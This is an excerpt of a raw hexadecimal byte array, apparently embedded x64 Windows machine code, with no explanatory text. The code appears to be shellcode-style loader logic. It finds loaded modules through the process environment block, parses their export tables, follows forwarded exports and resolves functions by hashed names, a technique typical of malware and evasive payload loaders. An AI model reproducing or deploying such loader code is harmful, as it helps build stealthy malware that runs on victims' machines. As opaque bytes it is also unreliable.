240 0x00, 0x00, 0x00, 0x74, 0x0e, 0x48, 0x8b, 0x85, 0x50, 0x01, 0x00, 0x00,
241 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0xb8, 0x00, 0x00, 0x00, 0x00,
242 0x48, 0x81, 0xc4, 0x10, 0x02, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89,
243 0xe5, 0x48, 0x83, 0xec, 0x30, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55,
244 0x18, 0x4c, 0x89, 0x45, 0x20, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40,
245 0x60, 0x48, 0x8b, 0x4d, 0x18, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x01, 0x00,
246 0x00, 0x48, 0x8b, 0x55, 0x20, 0x48, 0x89, 0x54, 0x24, 0x20, 0x41, 0xb9,
247 0xff, 0xff, 0xff, 0xff, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00, 0x00, 0x00,
248 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x83, 0xc4, 0x30, 0x5d,
249 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x60, 0x48, 0x89, 0x4d,
250 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d,
251 0x28, 0x48, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xcc,
252 0x30, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xcc, 0x65, 0x48, 0x8b, 0x00, 0x48,
253 0x89, 0x45, 0xc0, 0x48, 0x8b, 0x45, 0xc0, 0x48, 0x8b, 0x40, 0x60, 0x48,
254 0x89, 0x45, 0xe8, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x18, 0x48,
255 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x8b, 0x40, 0x10, 0x48,
256 0x89, 0x45, 0xf8, 0xeb, 0x45, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40,
257 0x30, 0x48, 0x89, 0x45, 0xd8, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x3b, 0x45,
258 0x18, 0x74, 0x23, 0x48, 0x8b, 0x55, 0x28, 0x48, 0x8b, 0x45, 0xd8, 0x41,
259 0xb9, 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48,
260 0x8b, 0x4d, 0x10, 0xe8, 0x76, 0x00, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf0,
261 0xeb, 0x01, 0x90, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x89,
262 0x45, 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x85,
263 0xc0, 0x74, 0x07, 0x48, 0x83, 0x7d, 0xf0, 0x00, 0x74, 0xa7, 0x48, 0x83,
264 0x7d, 0xf0, 0x00, 0x75, 0x3f, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x89, 0xc2,
265 0x48, 0x8b, 0x4d, 0x10, 0xe8, 0x3d, 0x03, 0x00, 0x00, 0x48, 0x89, 0x45,
266 0xd0, 0x48, 0x83, 0x7d, 0xd0, 0x00, 0x74, 0x1c, 0x48, 0x8b, 0x45, 0x10,
267 0x4c, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x55, 0x28, 0x48, 0x8b, 0x45, 0xd0,
268 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0x48, 0x89, 0x45, 0xf0, 0xeb, 0x08,
269 0x48, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf0,
270 0x48, 0x83, 0xc4, 0x60, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x00, 0x01,
271 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89,
272 0x8d, 0x90, 0x00, 0x00, 0x00, 0x48, 0x89, 0x95, 0x98, 0x00, 0x00, 0x00,
273 0x4c, 0x89, 0x85, 0xa0, 0x00, 0x00, 0x00, 0x44, 0x89, 0x8d, 0xa8, 0x00,
274 0x00, 0x00, 0x48, 0xc7, 0x45, 0x78, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83,
275 0xbd, 0x98, 0x00, 0x00, 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00,
276 0x00, 0xe9, 0xb3, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00,
277 0x00, 0x48, 0x89, 0x45, 0x68, 0x48, 0x8b, 0x45, 0x68, 0x8b, 0x40, 0x3c,
278 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00, 0x48, 0x01,
279 0xd0, 0x48, 0x89, 0x45, 0x60, 0x48, 0x8b, 0x45, 0x60, 0x48, 0x05, 0x88,
280 0x00, 0x00, 0x00, 0x48, 0x89, 0x45, 0x58, 0x48, 0x8b, 0x45, 0x58, 0x8b,
281 0x00, 0x89, 0x45, 0x54, 0x83, 0x7d, 0x54, 0x00, 0x75, 0x0a, 0xb8, 0x00,
282 0x00, 0x00, 0x00, 0xe9, 0x69, 0x02, 0x00, 0x00, 0x8b, 0x55, 0x54, 0x48,
283 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45,
284 0x48, 0x48, 0x8b, 0x45, 0x48, 0x8b, 0x40, 0x1c, 0x89, 0xc2, 0x48, 0x8b,
285 0x85, 0x98, 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0x40,
286 0x48, 0x8b, 0x45, 0x48, 0x8b, 0x40, 0x20, 0x89, 0xc2, 0x48, 0x8b, 0x85,
287 0x98, 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0x38, 0x48,
288 0x8b, 0x45, 0x48, 0x8b, 0x40, 0x24, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x98,
289 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0x30, 0x48, 0x83,
290 0xbd, 0xa0, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xab, 0x00, 0x00, 0x00,
291 0x48, 0x8b, 0x45, 0x48, 0x8b, 0x40, 0x18, 0x89, 0x45, 0x74, 0x83, 0x7d,
292 0x74, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xeb, 0x01,
293 0x00, 0x00, 0x8b, 0x45, 0x74, 0x83, 0xe8, 0x01, 0x89, 0xc0, 0x48, 0x8d,
294 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x38, 0x48, 0x01,
295 0xd0, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00,
296 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0x28, 0x48, 0x8b, 0x95, 0xa0, 0x00,
297 0x00, 0x00, 0x48, 0x8b, 0x45, 0x28, 0x48, 0x89, 0xc1, 0xe8, 0x62, 0x58,
298 0x00, 0x00, 0x85, 0xc0, 0x75, 0x3a, 0x8b, 0x45, 0x74, 0x83, 0xe8, 0x01,
299 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x45, 0x30, 0x48, 0x01,
300 0xd0, 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0, 0x48, 0x8d, 0x14, 0x85, 0x00,
301 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x40, 0x48, 0x01, 0xd0, 0x8b, 0x00,
302 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0,
303 0x48, 0x89, 0x45, 0x78, 0x83, 0x6d, 0x74, 0x01, 0x83, 0x7d, 0x74, 0x00,
304 0x74, 0x3f, 0x48, 0x83, 0x7d, 0x78, 0x00, 0x0f, 0x84, 0x71, 0xff, 0xff,
305 0xff, 0xeb, 0x32, 0x48, 0x8b, 0x45, 0x48, 0x8b, 0x50, 0x10, 0x8b, 0x85,
306 0xa8, 0x00, 0x00, 0x00, 0x29, 0xd0, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x85,
307 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x40, 0x48, 0x01, 0xd0, 0x8b,
308 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00, 0x48, 0x01,
309 0xd0, 0x48, 0x89, 0x45, 0x78, 0x48, 0x8b, 0x45, 0x78, 0x48, 0x3b, 0x45,
310 0x48, 0x0f, 0x82, 0x16, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x58, 0x8b,
311 0x40, 0x04, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x48, 0x48, 0x01, 0xd0, 0x48,
312 0x39, 0x45, 0x78, 0x0f, 0x83, 0xfc, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45,
313 0x78, 0x48, 0x89, 0x45, 0x20, 0xc7, 0x45, 0x70, 0x00, 0x00, 0x00, 0x00,
314 0xeb, 0x29, 0x8b, 0x55, 0x70, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x01, 0xd0,
315 0x0f, 0xb6, 0x10, 0x8b, 0x45, 0x70, 0x88, 0x54, 0x05, 0xe0, 0x8b, 0x55,
316 0x70, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c,
317 0x2e, 0x74, 0x1d, 0x83, 0x45, 0x70, 0x01, 0x8b, 0x55, 0x70, 0x48, 0x8b,
318 0x45, 0x20, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x09,
319 0x83, 0x7d, 0x70, 0x3b, 0x76, 0xc0, 0xeb, 0x01, 0x90, 0x8b, 0x45, 0x70,
320 0x83, 0xc0, 0x01, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0xe0, 0x64, 0x8b, 0x45,
321 0x70, 0x83, 0xc0, 0x02, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0xe0, 0x6c, 0x8b,
322 0x45, 0x70, 0x83, 0xc0, 0x03, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0xe0, 0x6c,
323 0x8b, 0x45, 0x70, 0x83, 0xc0, 0x04, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0xe0,
324 0x00, 0x8b, 0x45, 0x70, 0x83, 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x01, 0x45,
325 0x20, 0xc7, 0x45, 0x70, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x18, 0x8b, 0x55,
326 0x70, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b,
327 0x45, 0x70, 0x88, 0x54, 0x05, 0xa0, 0x83, 0x45, 0x70, 0x01, 0x8b, 0x55,
328 0x70, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84,
329 0xc0, 0x74, 0x06, 0x83, 0x7d, 0x70, 0x3e, 0x76, 0xd1, 0x8b, 0x45, 0x70,
330 0xc6, 0x44, 0x05, 0xa0, 0x00, 0x48, 0x8d, 0x4d, 0xa0, 0x48, 0x8d, 0x55,
331 0xe0, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc9, 0x49,
332 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x90, 0x00, 0x00, 0x00,
333 0xe8, 0x0c, 0xfc, 0xff, 0xff, 0x48, 0x89, 0x45, 0x78, 0x48, 0x8b, 0x45,
334 0x78, 0x48, 0x81, 0xc4, 0x00, 0x01, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48,
335 0x89, 0xe5, 0x48, 0x81, 0xec, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x4d,
336 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00,
337 0x00, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x1b, 0x8b, 0x55,
338 0xec, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b,
339 0x45, 0xec, 0x88, 0x94, 0x05, 0x50, 0xff, 0xff, 0xff, 0x83, 0x45, 0xec,
340 0x01, 0x8b, 0x55, 0xec, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x01, 0xd0, 0x0f,
341 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x06, 0x83, 0x7d, 0xec, 0x3f, 0x76, 0xce,
342 0x8b, 0x45, 0xec, 0xc6, 0x84, 0x05, 0x50, 0xff, 0xff, 0xff, 0x00, 0x8b,
343 0x45, 0xec, 0x83, 0xe8, 0x04, 0x89, 0xc0, 0x0f, 0xb6, 0x84, 0x05, 0x50,
344 0xff, 0xff, 0xff, 0x3c, 0x2e, 0x74, 0x5f, 0x8b, 0x45, 0xec, 0x8d, 0x50,
345 0x01, 0x89, 0x55, 0xec, 0x89, 0xc0, 0xc6, 0x84, 0x05, 0x50, 0xff, 0xff,
346 0xff, 0x2e, 0x8b, 0x45, 0xec, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xec, 0x89,
347 0xc0, 0xc6, 0x84, 0x05, 0x50, 0xff, 0xff, 0xff, 0x64, 0x8b, 0x45, 0xec,
348 0x8d, 0x50, 0x01, 0x89, 0x55, 0xec, 0x89, 0xc0, 0xc6, 0x84, 0x05, 0x50,
349 0xff, 0xff, 0xff, 0x6c, 0x8b, 0x45, 0xec, 0x8d, 0x50, 0x01, 0x89, 0x55,
350 0xec, 0x89, 0xc0, 0xc6, 0x84, 0x05, 0x50, 0xff, 0xff, 0xff, 0x6c, 0x8b,
351 0x45, 0xec, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xec, 0x89, 0xc0, 0xc6, 0x84,
352 0x05, 0x50, 0xff, 0xff, 0xff, 0x00, 0xc7, 0x45, 0xa4, 0x30, 0x00, 0x00,
353 0x00, 0x8b, 0x45, 0xa4, 0x65, 0x48, 0x8b, 0x00, 0x48, 0x89, 0x45, 0x98,
354 0x48, 0x8b, 0x45, 0x98, 0x48, 0x8b, 0x40, 0x60, 0x48, 0x89, 0x45, 0xe0,
355 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x89, 0x45, 0xd8,
356 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0x45, 0xf8,
357 0xe9, 0x8b, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40,
358 0x30, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x8b, 0x45, 0xd0, 0x48, 0x89, 0x45,
359 0xc8, 0x48, 0x8b, 0x45, 0xc8, 0x8b, 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48,
360 0x8b, 0x45, 0xd0, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0xc0, 0x48, 0x8b,
361 0x45, 0xc0, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x89, 0x45, 0xbc, 0x83,
362 0x7d, 0xbc, 0x00, 0x74, 0x43, 0x8b, 0x55, 0xbc, 0x48, 0x8b, 0x45, 0xd0,
363 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0xb0, 0x48, 0x8b, 0x45, 0xb0, 0x8b,
364 0x40, 0x0c, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xd0, 0x48, 0x01, 0xd0, 0x48,
365 0x89, 0x45, 0xa8, 0x48, 0x8b, 0x55, 0xa8, 0x48, 0x8d, 0x85, 0x50, 0xff,
366 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8, 0x87, 0x55, 0x00, 0x00, 0x85, 0xc0,
367 0x74, 0x0b, 0x48, 0x8b, 0x45, 0xd0, 0x48, 0x89, 0x45, 0xf0, 0xeb, 0x01,
368 0x90, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x89, 0x45, 0xf8,
369 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x74,
370 0x0b, 0x48, 0x83, 0x7d, 0xf0, 0x00, 0x0f, 0x84, 0x5d, 0xff, 0xff, 0xff,
371 0x48, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48,
372 0x8b, 0x50, 0x30, 0x48, 0x8d, 0x85, 0x50, 0xff, 0xff, 0xff, 0x48, 0x89,
373 0xc1, 0xff, 0xd2, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x45, 0xf0, 0x48,
374 0x81, 0xc4, 0xd0, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec,
375 0x60, 0x02, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00,
376 0x48, 0x89, 0x8d, 0xf0, 0x01, 0x00, 0x00, 0x48, 0x89, 0x95, 0xf8, 0x01,
377 0x00, 0x00, 0x4c, 0x89, 0x85, 0x00, 0x02, 0x00, 0x00, 0x4c, 0x89, 0x8d,
378 0x08, 0x02, 0x00, 0x00, 0x48, 0xc7, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x00,
379 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x89,
380 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00,
381 0x8b, 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00,
382 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48,
383 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x05, 0x88, 0x00, 0x00, 0x00,
384 0x48, 0x89, 0x85, 0xb8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x01,
385 0x00, 0x00, 0x8b, 0x00, 0x89, 0x85, 0xb4, 0x01, 0x00, 0x00, 0x83, 0xbd,
386 0xb4, 0x01, 0x00, 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00,
387 0xe9, 0x76, 0x03, 0x00, 0x00, 0x8b, 0x95, 0xb4, 0x01, 0x00, 0x00, 0x48,
388 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85,
389 0xa8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x8b,
390 0x40, 0x18, 0x89, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xd8, 0x01,
391 0x00, 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x3c,
392 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x8b, 0x40,
393 0x1c, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01,
394 0xd0, 0x48, 0x89, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8,
395 0x01, 0x00, 0x00, 0x8b, 0x40, 0x20, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8,
396 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x98, 0x01, 0x00,
397 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x8b, 0x40, 0x24, 0x89,
398 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48,
399 0x89, 0x85, 0x90, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00,
400 0x00, 0x8b, 0x40, 0x0c, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00,
401 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x88, 0x01, 0x00, 0x00, 0xc7,
402 0x85, 0xdc, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x29, 0x8b,
403 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x88, 0x01, 0x00, 0x00,
404 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x83, 0xc8, 0x20, 0x89, 0xc2, 0x8b,
405 0x85, 0xdc, 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0x60, 0x83, 0x85, 0xdc,
406 0x01, 0x00, 0x00, 0x01, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b,
407 0x85, 0x88, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84,
408 0xc0, 0x75, 0xc0, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0xc6, 0x44, 0x05,
409 0x60, 0x00, 0x48, 0x8b, 0x95, 0x08, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x45,
410 0x60, 0x48, 0x89, 0xc1, 0xe8, 0x94, 0x5b, 0x00, 0x00, 0x48, 0x89, 0x85,
411 0x80, 0x01, 0x00, 0x00, 0x8b, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x83, 0xe8,
412 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48,
413 0x8b, 0x85, 0x98, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x00, 0x89,
414 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48,
415 0x89, 0x85, 0x78, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x08, 0x02, 0x00,
416 0x00, 0x48, 0x8b, 0x85, 0x78, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8,
417 0x45, 0x5b, 0x00, 0x00, 0x48, 0x33, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48,
418 0x39, 0x85, 0x00, 0x02, 0x00, 0x00, 0x0f, 0x85, 0xd6, 0x01, 0x00, 0x00,
419 0x8b, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x83, 0xe8, 0x01, 0x89, 0xc0, 0x48,
420 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x01, 0x00, 0x00, 0x48, 0x01,
421 0xd0, 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0, 0x48, 0x8d, 0x14, 0x85, 0x00,
422 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x01,
423 0xd0, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00,
424 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48, 0x8b,
425 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48, 0x3b, 0x85, 0xa8, 0x01, 0x00, 0x00,
426 0x0f, 0x82, 0x73, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x01, 0x00,
427 0x00, 0x8b, 0x40, 0x04, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00,
428 0x00, 0x48, 0x01, 0xd0, 0x48, 0x39, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x0f,
429 0x83, 0x50, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x01, 0x00, 0x00,
430 0x48, 0x89, 0x85, 0x70, 0x01, 0x00, 0x00, 0xc7, 0x85, 0xdc, 0x01, 0x00,
431 0x00, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x3b, 0x8b, 0x95, 0xdc, 0x01, 0x00,
432 0x00, 0x48, 0x8b, 0x85, 0x70, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f,
433 0xb6, 0x10, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0x20,
434 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x01, 0x00,
435 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c, 0x2e, 0x74, 0x29, 0x83,
436 0x85, 0xdc, 0x01, 0x00, 0x00, 0x01, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00,
437 0x48, 0x8b, 0x85, 0x70, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6,
438 0x00, 0x84, 0xc0, 0x74, 0x0c, 0x83, 0xbd, 0xdc, 0x01, 0x00, 0x00, 0x3b,
439 0x76, 0xa5, 0xeb, 0x01, 0x90, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x83,
440 0xc0, 0x01, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0x20, 0x64, 0x8b, 0x85, 0xdc,
441 0x01, 0x00, 0x00, 0x83, 0xc0, 0x02, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0x20,
442 0x6c, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x83, 0xc0, 0x03, 0x89, 0xc0,
443 0xc6, 0x44, 0x05, 0x20, 0x6c, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x83,
444 0xc0, 0x04, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0x20, 0x00, 0x8b, 0x85, 0xdc,
445 0x01, 0x00, 0x00, 0x83, 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x01, 0x85, 0x70,
446 0x01, 0x00, 0x00, 0xc7, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
447 0x00, 0xeb, 0x24, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
448 0x70, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b, 0x85,
449 0xdc, 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0xa0, 0x83, 0x85, 0xdc, 0x01,
450 0x00, 0x00, 0x01, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
451 0x70, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0,
452 0x74, 0x09, 0x83, 0xbd, 0xdc, 0x01, 0x00, 0x00, 0x7e, 0x76, 0xbc, 0x8b,
453 0x85, 0xdc, 0x01, 0x00, 0x00, 0xc6, 0x44, 0x05, 0xa0, 0x00, 0x48, 0x8d,
454 0x4d, 0xa0, 0x48, 0x8d, 0x55, 0x20, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00,
455 0x00, 0x49, 0x89, 0xc9, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b,
456 0x8d, 0xf0, 0x01, 0x00, 0x00, 0xe8, 0x43, 0xf6, 0xff, 0xff, 0x48, 0x89,
457 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x01, 0x00, 0x00,
458 0xeb, 0x25, 0x83, 0xad, 0xd8, 0x01, 0x00, 0x00, 0x01, 0x83, 0xbd, 0xd8,
459 0x01, 0x00, 0x00, 0x00, 0x74, 0x0e, 0x48, 0x83, 0xbd, 0xd0, 0x01, 0x00,
460 0x00, 0x00, 0x0f, 0x84, 0xb0, 0xfd, 0xff, 0xff, 0x48, 0x8b, 0x85, 0xd0,
461 0x01, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x60, 0x02, 0x00, 0x00, 0x5d, 0xc3,
462 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x50, 0x48, 0x89, 0x4d, 0x10,
463 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x48, 0xc7, 0x45, 0xf0,
464 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xdc, 0x30, 0x00, 0x00, 0x00, 0x8b,
465 0x45, 0xdc, 0x65, 0x48, 0x8b, 0x00, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x8b,
466 0x45, 0xd0, 0x48, 0x8b, 0x40, 0x60, 0x48, 0x89, 0x45, 0xe8, 0x48, 0x8b,
467 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b,
468 0x45, 0xe0, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0x45, 0xf8, 0xeb, 0x31,
